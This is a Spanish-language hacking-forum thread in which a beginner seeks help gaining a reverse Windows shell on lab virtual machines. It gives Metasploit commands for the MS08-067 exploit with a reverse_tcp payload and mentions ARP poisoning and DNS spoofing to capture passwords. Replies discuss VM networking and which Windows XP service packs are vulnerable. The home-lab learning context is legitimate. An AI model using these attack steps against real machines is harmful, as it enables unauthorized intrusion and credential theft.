|
Título: Metasploit Publicado por: n3n3 en 24 Enero 2014, 19:26 pm Hola muye buenas tardes. :DEspero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender. Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo. lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use: :huh: use exploit/windows/smb/ms08_067_netapi set RHOST 000.000.000.000 <-----Ip a atacar set payload windows/shell/reverse_tcp set LHOST 000.000.000.000 <----Ip atacante exploit Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox Ayudame por favor ***************************************************************************** Título: Re: Metasploit Publicado por: MCKSys Argentina en 24 Enero 2014, 19:31 pm Una pregunta: el XP es vulnerable? Osea, está actualizado o no? Si está patcheado, no funcionará el exploit... :P
Saludos! Título: Re: Metasploit Publicado por: n3n3 en 24 Enero 2014, 19:50 pm Amigo tiene apenas 1 dia de que lo tengo instalado, pero de ser asi lo reinstalo, es un XP SP 3
Pero mi moden tengo abiertos los puertos, y yo creo que debe de haber alguna manera para poder penetrar en la maquina, no importa si esta actualizado, por eso mismo posteo mi duda, haber si alguien conoce alguna forma de hackear ese Xp sp3 o windows 7 desde backtrack 5 o kali linux desde metasploit o alguna otra manera, la que sea no importa solo quiero aprender alguna que sea exitosa :-( Título: Re: Metasploit Publicado por: noopynoob en 24 Enero 2014, 19:51 pm que yo sepa no se puede desde una maquina virtual ya que la IP no esta dentro del rango, hay que tener dos maquinas para realizar el ataque
Título: Re: Metasploit Publicado por: n3n3 en 24 Enero 2014, 19:55 pm Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
:-( Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh: Título: Re: Metasploit Publicado por: noopynoob en 24 Enero 2014, 20:04 pm Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local??????????? :-( Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh: pues se puede hacer el ARP spoofing desde una maquina virtual pero solo afectara a la maquina en donde esta corriendo la maquina virtual y no en las demás, una vez intente penetrar win8 desde backtrack que corría en una maquina virtual y no me funciono entonces quite la mv e inicie backtrack en una laptop y el ataque si funciono. Título: Re: Metasploit Publicado por: n3n3 en 24 Enero 2014, 20:15 pm Ok intentare los ataques desde una PC fisica, y posteriormente voy a postear los resultados obtenidos, muchas gracias.
Título: Re: Metasploit Publicado por: engel lex en 25 Enero 2014, 04:13 am que maquina virtual usas? porque depende de ella puedes configurar las ip y todo eso para simular una red real :P
Título: Re: Metasploit Publicado por: n3n3 en 26 Enero 2014, 21:06 pm Uso Virtual Box, lo que pasa que en YouTube hay videos donde realizan ataques con armitage, y tambien manualmente con el Metasploid, haciendose de una shell windows, en estas mismas maquinas virtuales, y hasta ahora no me a funcionado ni en NAT ni en Bridgeb.
Ayuendeme de cual es el problema, hago escaneo con nmap y me aparecen mis maquinas fisicas en el kali virtual, pero la otra PC con WinXp que es virtual tambien, no me aparece. Tambien cuando ataco la mia que tiene Win7 Ultimate, me sale el siguiente error desde metasploit, me imagino que es por que no es vulnerable a este tipo de ataque, ustedes que opinan sobre este otro tema... (http://) Título: Re: Metasploit Publicado por: Owl-City en 27 Enero 2014, 23:15 pm Hola,
Amigo, te compadezco, no soy un profesional, no quiero ser necio, pero específicamente que exploit usaste, no me des el proceso solo el nombre, porque si es un payload, tienes que es pecificar. Me explico: Es de x86 o x64. Se que usaste Cain y Abel, para hacer tus ataques de contraseña y envenenar la red. Y sí, es automático, por eso te dio en el blanco. Lo mejor que puedes hacer es programarte tu propio exploit en una terminal ;) Título: Re: Metasploit Publicado por: n3n3 en 18 Febrero 2014, 16:10 pm Asi es mi estimado, use un payload de windows shell para conexion reversa y poder robar sesion de windows, si me pudieras ayudar sobre que especificar y como, ya que especifico antes de atacar siempre pongo mi puerto e ip con el puerto e ip de la victima, no se que mas tenga que especificar, te agradeceria que me lo hicieras saber.
Título: Re: Metasploit Publicado por: croceell en 2 Marzo 2014, 13:46 pm Muy buenas n3n3!!
Te aconsejo utilizar el exploit "msrpc" para windows xp, porque te da un meterpreter, y realmente tienes total acceso a la máquina, aunque he planteado un problemilla en esta misma web sobre este exploit ( http://foro.elhacker.net/bugs_y_exploits/error_en_exploit_msrpc_windows_xp-t409697.0.html ) Se que conseguiré entrar, soy muy cabezota! jajaja si no es por esta forma, entraré por otra... Te aconsejo este exploit, porque creo que es fácil de usar, lo puedes encontrar escaneando con nmap la máquina victima, metiendo los datos en metasploit buscando los puertos abiertos, este exploit utiliza el puerto 135 y como ya dije antes, te da un meterpreter. Espero que te sea de ayuda crack! ;) Título: Re: Metasploit Publicado por: n3n3 en 6 Marzo 2014, 19:14 pm Muchas gracias, lo intentare, al parecer mi problema era con las maquinas virtuales, pero ya lo realize en mi laboratorio nuevo, compre 2 maquinas mas y le puse a una win7 y otra con win xp y todo salio bien, ahora estoy intentando acceder a otra maquina que recien le monte el WinServer2008, pero no e podido =)
Gracias y un saludo! Título: Re: Metasploit Publicado por: Owl-City en 21 Abril 2014, 01:15 am Te envié un mns personal
Título: Re: Metasploit Publicado por: h4pp1 en 23 Abril 2014, 00:04 am Haber , soy un novato y he hecho como tu , virtualizando un xp sp3 x86 , un xp sp2 x86 y un kali linux , los dos xp con el cortafuegos deshabilitado y con acceso de escritiorio remoto y compartiendo impresoras y archivos. He ejecutado el mismo exploit y payload que tu !! , en xp sp3 no me ha funcionado y en xp sp2 si !! , investigando un poco he visto , con el servipack 3 windows corrijió esta vulnerabilidad , da igual que tengas el puerto en cuestión abierto !!.
Por cierto la red de de las victimas en virtualbox las he configurado como adaptador puente osea que están todas dentro del mismo rango. Saludos. Título: Re: Metasploit Publicado por: dantemc en 24 Abril 2014, 17:33 pm hola:
1-) el ms08_067 no funciona en xp sp3, creo que en sp2 sí. Por si las dudas montante un XP sin SP incluídos. 2-) configura la interfaz de red de las máquinas en modo puente o bridge. SI las pones en modo NAT no se verá. avisas. |